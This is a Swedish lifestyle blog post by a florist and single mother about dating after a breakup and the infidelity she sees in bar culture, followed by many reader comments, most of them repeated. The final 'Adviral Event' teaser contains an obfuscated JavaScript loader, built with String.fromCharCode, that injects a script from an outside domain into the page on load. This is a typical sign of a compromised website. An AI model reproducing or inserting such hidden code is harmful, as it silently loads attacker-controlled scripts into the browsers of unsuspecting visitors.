Singellivet, otroheten och alla skamliga förslag!

_MG_0481

Att leva ett omtumlande singelliv! Det kan verkligen ta på krafterna och energin emellanåt.Det är inte als så sådär sexigt och glammig som i ”Sex & the City” serien! 

När jag blev singel för ca 4 år sedan så kom jag direkt ur en lång relation. Jag blev bedragen och lämnad och kände just där och då att jag ALDRIG någonsin mer skulle träffa någon. Jag var sårad, besviken och bitter.

Min Lillleman var bara några veckor gammal när jag blev lämnad.

Det var lagom omtumlande att hitta sin ”mamma roll” samtidigt som man skulle flytta, göra bo delning och ta hand om alla praktiska saker… Då hade jag dessutom två butiker och 12 anställda att ta hand om. Det gick sådär faktiskt…. Jag var inte på topp, och levererade därefter. 

Men som jag brukar säga det som inte dödar det härdar… Allting blir erfarenheter på båd gott och ont. Jag hittade styrkan i min lilla nyfödda bebis. Jag fick krafter som jag aldrig trodde jag haft.

 Oavsett vad jag har gått igenom så har det stärkt mig idag. Det och tidigare erfarenheter har format mig till en stark självständig och driven kvinna. Jag känner mig trygg i mig själv. Jag gav mig själv tiden att vara ensam och läka. Jag vill inte vara bitter. Jag är inte svartsjuk i mig själv och vill inte ta med mig mitt ”gamla” förhållande in i något nytt.

Men att vara singel är en historia för sig! 

_MG_0489

Perfekt 3:e dejten outfit. Klänning Stylein som du hittar HÄR hos BlueCo tillsammans med halsband från Shlimp and ulrich som du hittar HÄR Skor: Karen Millen.

Jag kommer ihåg när jag skulle på min första dejt. Jag hade blivit övertalad utav mina vänner. Men jag hade verkligen ingen lust. Motvilligt gav jag med mig och gick på den där dejten. -jösses vad ringrostig jag var! Det var fruktansvärt! Jag skrattade hejdlöst när jag tillslut lämnade restaurangen efter x-antal timmar med pinsamma tystnader och absolut no feeling! Jaja, det var iallfall en början.

En tröskel var just passerad och jag började sakta men säkert att vara mer mottaglig för att träffa någon. Sen kom Tv produktionen Ensam Mamma söker. Det var någonting ogenomtänkt och spontant som jag tackade ja till. Jag har inte ångrat mig en sekund, även om jag inte träffade någon kärlek…. Killarna var alldeles för unga, och Mr right fanns inte där.

MEN jag träffade Magdalena som har blivit som en syster för mig. Det är också en typ utav kärlek <3

_MG_0526

Foto Linda Himsel Make up: Sara Sethsson.

Att träffa någon ute på krogen, tror jag sällan funkar. Jag menar hur bra omdöme har man klockan kvart i fem på morgonen efter en utekväll?

-inte särskilt! 😉

Det som verkligen fascinerat mig och samtidigt förvånat mig är att det sker så otroligt mycket otrohet.Överallt, närsomhelst, och var som helst.  -Är det verkligen såååå vanligt?!

 Jag startade eget som 18 åring,träffade Lillemans pappa, fick två styvpojkar och ett familjeliv. Så jag var inte ute så mycket och fick inte se ”den världen”. Den kom som en chock när jag plötsligt befann mig mitt i den. 

Är man ute så ser man hur det flirtas från både höger och vänster. Man ser ur flirtandet övergår till handling. Otroheten är vardagsmat. Jag har sett hur vissa killar gått in och ut på samma toalett med olika tjejer på samma kväll. (Vi pratar vuxna män)

Jag själv har under mina singelår fått otroligt många skamliga förslag.  Trots att männen ifråga ofta har haft en ring på fingret.

Sorgligt kan jag tycka.

Hur upphetsande är det om en packad man kommer fram på krogen, sluddrar och fumlar i ett försök att få till det… Med en ring på fingret dessutom. -INTE särskilt! haha!

Lite mer än så får man nog jobba på det…. 😉

En del utav mig är en obotlig romantiker som tror på tvåsamheten och kärleken. Vissa kallar det naivt (Michela) Jag själv kan tycka att det är lite charmigt utav mig

-Eller?? vad tycker du? Visst tror vi väl ändå på kärleken? Ibland får man bara leta lite längre och kanske gå igenom några förhållanden innan man tillslut hittar rätt…

Men däremot så tror jag INTE på att leva i en halvdan relation. Det är slöseri med både tid och energi! Självklart går ett förhållande upp och ner precis som allting annat. Men det negativa får inte ta överhand, man ska vara lycklig!

Det värsta jag fått till mig under mina singelår är alla  (alla som i flera gånger, ja) småbarnspappor som mer eller mindre bönar och ber efter sex och närhet. -Jösses!!! Det är det ”lättaste bytet” att få med sig hem från krogen, om det är just det man är ute efter… 

Första gången var jag helt chockad! Både över att mannen ifråga förklarade lite väl detaljerat om förlossnings komplikationer, sitt icke existerande sexliv och sin längtan efter en sexuellt relation även om han givetvis älskade sin fru och sin familj. Dessvärre har detta hänt mer en en gång, så jag förvånas inte ens över detta längre…

Det är nog det absolut lättaste för en kvinna, att snärja en småbarnspappa. Ofta är det ju i småbarns tiden som man som föräldrar ”glömmer bort” att måna om varandra…. Allt fokus ligger på bebisen. Man är som mamma trött, sliten och kanske inte i topp form. Då är det lätt att pappan känner sig åsidosatt.

-känner du igen dig?  

NU med tanke på min egna erfarenhet så är jag totalt anti mot just detta. Dom stackarna som kommit fram till mig i detta ärendet (och ja, det har hänt flera gånger, ute på krogen) Dom får sig en kort men bestämd rekommendation om att gå hem och ta vara på det dom har, eller att ha stake nog att lämna det dom har för att sedan ut och rumla runt!

-Om jag är bitter? nej… inte längre, bara brutalt ärlig 😉

Nu vet jag själv att allting alltid kanske inte är svart eller vitt. Känslor kan man inte påverka… Men ändå…

Jag som florist gör ganska många buketter i kärlekens tecken. Det är så fantastisk att se dessa underbara pensionärs gubbar komma in och beställa en vacker bukett och stolt berätta att det är guldbröllops dag. jag blir sådär varm och lycklig inombords varje gång det händer. Det finns faktiskt dom som håller ihop lääääänge trots allt =) 

_MG_0535

Jag själv trivs väldigt bra som singel. Jag har börjat blir bekväm med det. att inte behöva ta hänsyn till någon annan 😉

Samtidigt så lockar inte ”utelivet” med allt vad det innebär överhuvudtaget .

Att följa ”spelets” alla regler… dvs att ”spela svår” inte svara på sms, svara på sms, att ha en strategi eller baktanke med allt man gör, inte visa känslor osv…  -DET är inte min grej! Varför göra det så komplicerat? Gå på magkänslan och krångla inte till det så mycket 😉 Vi kvinnor över analyserar alldeles för mycket ibland… -Gör inte det!

Jag själv dejtar och trivs bra med det… sen får man se vad det leder till….

Jag skulle nog kunna skriva en hel bok om singellivet. jag har så många otroligt icke rumsrena historier som man knappt tror att det kan vara sant. Jag skulle också kunna skriva en bok med rubriken 10 saker du inte bör göra om du vill behålla din dejt . -haha!

 

Hehe! Kanske är det pga utav egna misstag eller väninnans 😉 Oavsett vad så är det extremt användbara tips för dig som är nyseparerad 😉 Jag vet faktiskt inte riktigt vart jag vill komma med detta inlägget…. Kanske är det för att just detta varit ett samtals ämne med mina väninnor på senaste tiden. Något vi reflekterat över.  Ja ja… fortsättning följer 😉 Nog om detta. 

Jag fick just denna inbjudan utav Hannah.

image

 

-Tack snälla du… ser verkligen fram emot detta eventet.

Det ska bli såååå kul att kika in det senaste ifrån Femme kollektionen. Du har väl inte missat att Maggans syster Hannah har startat en egen klädkollektion. Du hittar den HÄR 

Nu ska jag krypa ner i sängen…  Vi hörs imorgon fina du!

Kramar! /My Martens

Ps missa inte mina blomster tips i förra inlägget =)

 

 

40 Komentarer

 1. Haha håller med dig på alla punkter. Sa det till min sambo för ett tag sen, att jag tidigare trodde att nyblivna pappor var superupptagna men att man nu inser att de. . Nog törstar mest.. om man säger så. Ha ha
  Jag tror på livslång kärlek men man måste nog vara realistisk i om det är rimligt att bara ligga med/känna känslor för bara en person resten av livet. Vad vet jag. Jag har varit attraherad av min i 6 år nu och hoppas det fortsätter lika ☺

 2. Hej! Har också reflekterat över hur många olyckliga relationer det finns! Småbarnsåren är väl bådas tänker jag. Båda måste ju jobba på relationen då! Otrohet kommer väl sällan plötsligt. Vi pratar ofta om trohet i vår relation. Det är viktigt för oss båda,för vi är rädda om vår relation? Ibland känner man att man behöver lite mer i relationen. Ibland är det den andre som behöver mer! Det är viktigt att vara tydlig med vad man själv vill också! Annars blir man missnöjd på sikt, och med det lite tråkig faktiskt! It takes two to tango,så att vårda relationen tillsammans är nog nyckeln! Ha det bäst! Love ❤️❤️❤️

 3. Du har så rätt, har lite samma historia med svek, singel sen snart 3 år, dotter på 6 år. Känner verkligen igen beskrivningen om otroheten, det är ju inte ett erbjudande man fått. Men den som väntar på ngt gott…. Någonstans finns någon till oss oxå.

 4. Haha håller med dig på alla punkter. Sa det till min sambo för ett tag sen, att jag tidigare trodde att nyblivna pappor var superupptagna men att man nu inser att de. . Nog törstar mest.. om man säger så. Ha ha
  Jag tror på livslång kärlek men man måste nog vara realistisk i om det är rimligt att bara ligga med/känna känslor för bara en person resten av livet. Vad vet jag. Jag har varit attraherad av min i 6 år nu och hoppas det fortsätter lika ☺

 5. Hej! Har också reflekterat över hur många olyckliga relationer det finns! Småbarnsåren är väl bådas tänker jag. Båda måste ju jobba på relationen då! Otrohet kommer väl sällan plötsligt. Vi pratar ofta om trohet i vår relation. Det är viktigt för oss båda,för vi är rädda om vår relation? Ibland känner man att man behöver lite mer i relationen. Ibland är det den andre som behöver mer! Det är viktigt att vara tydlig med vad man själv vill också! Annars blir man missnöjd på sikt, och med det lite tråkig faktiskt! It takes two to tango,så att vårda relationen tillsammans är nog nyckeln! Ha det bäst! Love ❤️❤️❤️

 6. Du har så rätt, har lite samma historia med svek, singel sen snart 3 år, dotter på 6 år. Känner verkligen igen beskrivningen om otroheten, det är ju inte ett erbjudande man fått. Men den som väntar på ngt gott…. Någonstans finns någon till oss oxå.

 7. God morgon <3
  Otrohet är något jag verkligen blir arg på. Hur kan man göra så mot någon.
  Du skriver verkligen bra i blogg inlägget tycker jag. Var intressant att läsa ?
  Och jag tror att när man minst anar det så står mannen med hjärtat på rätta ställer precis bredvid än och då behöver man inte ens fundera ? det liksom händer av sig självt.
  Men så är jag en hopplös romantiker med antar jag <3
  Kram och ha en toppen dag

 8. Hej!
  Min första titt här, mysig, vacker och inspirerande blogg! Vilken resa du haft/har, tufft, men du verkar vara otroligt stark och ha massor med härliga människor kring dig ?
  Nu ska jag kika vidare här..
  Ha en fin dag
  /Catta

 9. Är också lite förvånad/skrämd hur många det är som söker något vid sidan om. I mitt fall så är det tjejer/kvinnor som söker vid sidan om.
  Skulle jag vara i ett förhållande där hon var otrogen, så har jag otroligt svårt att se att förhållandet skulle överleva det. Iom otroheten så har något som för mig är väldigt viktigt förstörts och det är förtroendet/tilliten till sin partner.

 10. God morgon <3
  Otrohet är något jag verkligen blir arg på. Hur kan man göra så mot någon.
  Du skriver verkligen bra i blogg inlägget tycker jag. Var intressant att läsa 🙂
  Och jag tror att när man minst anar det så står mannen med hjärtat på rätta ställer precis bredvid än och då behöver man inte ens fundera 😉 det liksom händer av sig självt.
  Men så är jag en hopplös romantiker med antar jag <3
  Kram och ha en toppen dag

 11. Hej!
  Min första titt här, mysig, vacker och inspirerande blogg! Vilken resa du haft/har, tufft, men du verkar vara otroligt stark och ha massor med härliga människor kring dig 🙂
  Nu ska jag kika vidare här..

  Ha en fin dag
  /Catta

 12. Är också lite förvånad/skrämd hur många det är som söker något vid sidan om. I mitt fall så är det tjejer/kvinnor som söker vid sidan om.

  Skulle jag vara i ett förhållande där hon var otrogen, så har jag otroligt svårt att se att förhållandet skulle överleva det. Iom otroheten så har något som för mig är väldigt viktigt förstörts och det är förtroendet/tilliten till sin partner.

    • Japp, jag skrev genom mobilen och med emojis som någon annan skrev om här ?
     Skulle bara skriva att du skriver exakt som jag upplever det och brukar svara! Skillnaden på dig och mig är att jag är gift och de flesta vet om det ( bor på en liten ort) De flesta vet även vem jag är gift med och brukar småprata med honom, men ändå kommer de fram till mig och flörtar. Vad tänker de på mornarna när vi lämnar våra barn på samma skola och dagis? Borde man inte skämmas? Är det ”ok” i samhället? Jag kan inte förstå hur tjejer kan ta åt sig smicker från upptagna män och tro att de är speciella . Jag tycker att det är vidrigt. Tur att vi är olika ? Väldigt bra skrivet och du verkar så ödmjuk trots framgång ?!! Jag har en nyfiken fråga. Är du utbildad florist eller körde du på ändå? Kram Jenny

   • Jag läste att det kan bero på att man skriver emojis, alltså väljer de färdiga som finns, då bryts texten efter på nåt vis:)

    • Japp, jag skrev genom mobilen och med emojis som någon annan skrev om här 😉
     Skulle bara skriva att du skriver exakt som jag upplever det och brukar svara! Skillnaden på dig och mig är att jag är gift och de flesta vet om det ( bor på en liten ort) De flesta vet även vem jag är gift med och brukar småprata med honom, men ändå kommer de fram till mig och flörtar. Vad tänker de på mornarna när vi lämnar våra barn på samma skola och dagis? Borde man inte skämmas? Är det ”ok” i samhället? Jag kan inte förstå hur tjejer kan ta åt sig smicker från upptagna män och tro att de är speciella . Jag tycker att det är vidrigt. Tur att vi är olika 😉 Väldigt bra skrivet och du verkar så ödmjuk trots framgång :)!! Jag har en nyfiken fråga. Är du utbildad florist eller körde du på ändå? Kram Jenny

   • Jag läste att det kan bero på att man skriver emojis, alltså väljer de färdiga som finns, då bryts texten efter på nåt vis:)

 13. Finns inget på krogen förutom one night stands och otrogna. Vill man ha ett seriöst förhållande…och då menar jag inget tråkigt sådant utan träffa någon likasinnad så rekommenderar jag ..hör å häpna Matchaffinity.com . Trodde aldrig att det skulle hända ? testat många men här finns de seriösa då det tar en stund att svara på frågor och lägga upp sin profil. Oj, detta låter som nån slag reklam O_o men det är faktiskt sant. Jag är egenföretagare med ett speciellt å konstigt liv å jag fann den rätta som står ut med mig i vått å torrt å jag står ut med honom! Testa vet ja!
  Ps…kanske skulle få reklampengar för detta inlägg ? LöveEmilia

 14. Finns inget på krogen förutom one night stands och otrogna. Vill man ha ett seriöst förhållande…och då menar jag inget tråkigt sådant utan träffa någon likasinnad så rekommenderar jag ..hör å häpna Matchaffinity.com . Trodde aldrig att det skulle hända 🙂 testat många men här finns de seriösa då det tar en stund att svara på frågor och lägga upp sin profil. Oj, detta låter som nån slag reklam O_o men det är faktiskt sant. Jag är egenföretagare med ett speciellt å konstigt liv å jag fann den rätta som står ut med mig i vått å torrt å jag står ut med honom! Testa vet ja!
  Ps…kanske skulle få reklampengar för detta inlägg 🙂 LöveEmilia

 15. Visst är det så, som du skriver. Kärleken kan vara en snårig djungel, men också helt underbar!! Jag var i en halvdan relation som hade varat i 5-6 år.. Sen en kväll träffade jag en kille som jag bara kände igen till utseendet men alltid haft en gott öga till. Herre Gud, vilken lyckoträff. Det gick inte att stå emot honom. Han hade allt jag saknade och inte trodde fanns.. Första kramen med honom och sen var jag fast. det kändes bara sååå rätt. Och det är det än idag, 9 år senare. Lika kär nu som då. I love him <3

 16. Visst är det så, som du skriver. Kärleken kan vara en snårig djungel, men också helt underbar!! Jag var i en halvdan relation som hade varat i 5-6 år.. Sen en kväll träffade jag en kille som jag bara kände igen till utseendet men alltid haft en gott öga till. Herre Gud, vilken lyckoträff. Det gick inte att stå emot honom. Han hade allt jag saknade och inte trodde fanns.. Första kramen med honom och sen var jag fast. det kändes bara sååå rätt. Och det är det än idag, 9 år senare. Lika kär nu som då. I love him <3

 17. Usch gud… jag hade nog aldrig klarat eller orkat bli singel igen (11 år sedan).
  Sen de där om otrohet, min mamma har alltid sagt till mig att det är hur vanligt som helst, nästan alla är eller har varit otrogen…Det har man ju märkt stämmer allt eftersom man själv växte upp in i vuxen livet! Känns ju jätte hämskt när man tänker på de :/

 18. Usch gud… jag hade nog aldrig klarat eller orkat bli singel igen (11 år sedan).

  Sen de där om otrohet, min mamma har alltid sagt till mig att det är hur vanligt som helst, nästan alla är eller har varit otrogen…Det har man ju märkt stämmer allt eftersom man själv växte upp in i vuxen livet! Känns ju jätte hämskt när man tänker på de :/

 19. Tänk om man ändå hade förstått sig på den typen av människor, My. Själv är man dock förhållandetypen. Har aldrig fattat meningen med varken one-night, svartsjuka, ragga på krogen, otrohet och/eller nätdejta.. Tycker det är bättre och mindre riskfyllt att tjöta dejting på telefon istället. (Ej telefik)
  Asså, så du dejtar, My? ? Härligt! Hoppas du hittar din prins. Tack för skön stil, blogg och allt annat.
  / kram Daniel.

 20. Tänk om man ändå hade förstått sig på den typen av människor, My. Själv är man dock förhållandetypen. Har aldrig fattat meningen med varken one-night, svartsjuka, ragga på krogen, otrohet och/eller nätdejta.. Tycker det är bättre och mindre riskfyllt att tjöta dejting på telefon istället. (Ej telefik)
  Asså, så du dejtar, My? 🙂 Härligt! Hoppas du hittar din prins. Tack för skön stil, blogg och allt annat.
  / kram Daniel.

 21. Hej! Vilken härlig blogg! ? Kul när någon skriver om singellivet. Kommer garanterat gå in och läsa. Kika gärna in på min blogg och ge mig lite feedback. ?
  Jag är en singelmamma som skriver om dejtinglivet och självkänsla. Dessa män alltså! Garanterar ett gott skratt. ?
  http://www.zilvi.blogg.se

 22. Hej! Vilken härlig blogg! 🙂 Kul när någon skriver om singellivet. Kommer garanterat gå in och läsa. Kika gärna in på min blogg och ge mig lite feedback. 🙂
  Jag är en singelmamma som skriver om dejtinglivet och självkänsla. Dessa män alltså! Garanterar ett gott skratt. 🙂
  http://www.zilvi.blogg.se

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/